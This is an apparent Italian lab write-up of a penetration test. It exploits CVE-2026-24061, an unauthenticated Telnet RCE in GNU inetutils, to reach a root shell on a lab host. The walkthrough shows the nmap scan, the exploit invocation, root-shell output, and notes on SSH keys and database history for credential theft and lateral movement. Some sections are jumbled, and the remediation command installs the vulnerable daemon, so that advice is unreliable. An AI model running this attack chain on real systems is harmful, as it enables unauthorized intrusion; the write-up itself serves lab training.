
Writeup/finding di CVE-2026-24061 all'interno del laboratorio Cyberhawks
Crediti a: @SafeBreach-Labs
CVE: CVE-2026-24061
Laboratorio: Cyberhawks Lab
Target: 10.1.1.1 (demo.cyberhawks.lab)
ID Finding: WU-08
Data: 2026-09-08
Severità: Critica
Stato: Confermata / Sfruttata
Durante una valutazione dell'ambiente di laboratorio Cyberhawks, è stata identificata e sfruttata con successo una vulnerabilità di Remote Code Execution (RCE) non autenticata sull'host target (10.1.1.1). Lo sfruttamento di CVE-2026-24061 tramite un servizio Telnet esposto (TCP/23) ha consentito di ottenere una shell interattiva con privilegi di root, garantendo il pieno controllo amministrativo del sistema.
| Campo | Valore |
|---|---|
| IP Target | 10.1.1.1 |
| Hostname Target | demo.cyberhawks.lab |
| Sistema Operativo | Linux 6.12.41+deb13-amd64 (Debian 13) |
| SO Attaccante | Parrot OS |
| Tipo di Valutazione | Test di Penetrazione (Ambiente di Laboratorio) |
È stata eseguita una scansione delle versioni dei servizi con Nmap contro il target per enumerare le porte e i servizi aperti.
Comando:
nmap -sV 10.1.1.1
Riepilogo dei Risultati:
Osservazioni Rilevanti:
CVE-2026-24061 è una vulnerabilità di Remote Code Execution non autenticata che interessa il componente demone Telnet di GNU inetutils 2.6. Lo sfruttamento consente a un attaccante remoto non autenticato di eseguire comandi arbitrari sul sistema target con i privilegi del servizio in esecuzione — in questo caso, root.
Uno script di exploit Python appositamente realizzato (telnet_rce.py) che mira a CVE-2026-24061 è stato eseguito contro il servizio Telnet vulnerabile.
Comando:
python3 telnet_rce.py 10.1.1.1
Output dell'Exploit:
[*] Connesso a 10.1.1.1:23
[*] Sessione interattiva avviata. Usa Ctrl+C per uscire.
Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)
root@demo:~#
Dopo aver ottenuto una shell, i seguenti comandi hanno confermato il livello di accesso raggiunto:
Verifica dell'Identità:
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)
Enumerazione del Filesystem:
root@demo:~# ls -la
totale 36
drwx------ 6 root root 4096 Ago 28 14:47 .
drwxr-xr-x 19 root root 4096 Ago 28 15:37 ..
-rw-r--r-- 1 root root 607 Mag 12 2025 .bashrc
drwx------ 4 root root 4096 Set 6 2025 .cache
drwxr-xr-x 3 root root 4096 Set 6 2025 .config
drwxrwxr-x 3 root root 4096 Set 6 2025 .local
-rw------- 1 root root 261 Set 6 2025 .mariadb_history
-rw-r--r-- 1 root root 132 Mag 12 2025 .profile
drwx------ 2 root root 4096 Set 6 2025 .ssh
Verifica della Versione del Servizio
root@demo:~# telnet --version
telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
Licenza GPLv3+: GNU GPL versione 3 o successiva <https://gnu.org/licenses/gpl.html>.
Questo è software libero: sei libero di modificarlo e ridistribuirlo.
NON ESISTE ALCUNA GARANZIA, nei limiti consentiti dalla legge.
Scritto da molti autori.
Risultati chiave dal post-sfruttamento:
.mariadb_history — indica un uso attivo del database MariaDB; potenziale per ulteriore raccolta di credenziali o esfiltrazione di dati..ssh/ — potrebbe contenere chiavi private utilizzabili per movimento laterale verso altri host.root (UID 0) senza alcun passaggio di escalation dei privilegi.| Categoria | Valutazione |
|---|---|
| Riservatezza | Critica — tutti i dati sul sistema sono accessibili |
| Integrità | Critica — l'attaccante può modificare o distruggere qualsiasi dato |
| Disponibilità | Critica — l'attaccante può terminare i servizi o far crashare il sistema |
È stato raggiunto il pieno compromesso del sistema in un singolo passaggio non autenticato. Un attaccante con accesso a questo segmento di rete potrebbe:
apt update && apt install inetutils-telnetd
| Artefatto | Descrizione |
|---|---|
| Output della scansione Nmap | Enumerazione completa di porte/servizi di 10.1.1.1 |
telnet_rce.py | Script di exploit utilizzato per attivare CVE-2026-24061 |
| Log della sessione shell | Trascrizione della shell interattiva di root |
Rapporto preparato per Cyberhawks Lab — solo a scopo educativo.
| Porta | Stato | Servizio |
|---|
| 21/tcp | Aperta | FTP (tcpwrapped) |
| 22/tcp | Aperta | SSH (tcpwrapped) |
| 23/tcp | Aperta | Telnet |
| 25/tcp | Aperta | SMTP (tcpwrapped) |
| 53/tcp | Aperta | DNS (tcpwrapped) |
| 80/tcp | Aperta | HTTP (tcpwrapped) |
| 110/tcp | Aperta | POP3 (tcpwrapped) |
| 111/tcp | Aperta | RPC (tcpwrapped) |
| 139/tcp | Aperta | NetBIOS (tcpwrapped) |
| 143/tcp | Aperta | IMAP (tcpwrapped) |
| 445/tcp | Aperta | SMB (tcpwrapped) |
| 2049/tcp | Aperta | NFS (tcpwrapped) |
| 3306/tcp | Aperta | MySQL/MariaDB (tcpwrapped) |
| 3389/tcp | Aperta | RDP (tcpwrapped) |
| 5901/tcp | Aperta | VNC (tcpwrapped) |
| Campo | Dettaglio |
|---|
| CVE | CVE-2026-24061 |
| Servizio Interessato | Telnet (GNU inetutils 2.6, TCP/23) |
| Tipo di Vulnerabilità | Remote Code Execution (RCE) non autenticata |
| Punteggio CVSS | Critico |
| Autenticazione Richiesta | Nessuna |
| Interazione Utente Richiesta | Nessuna |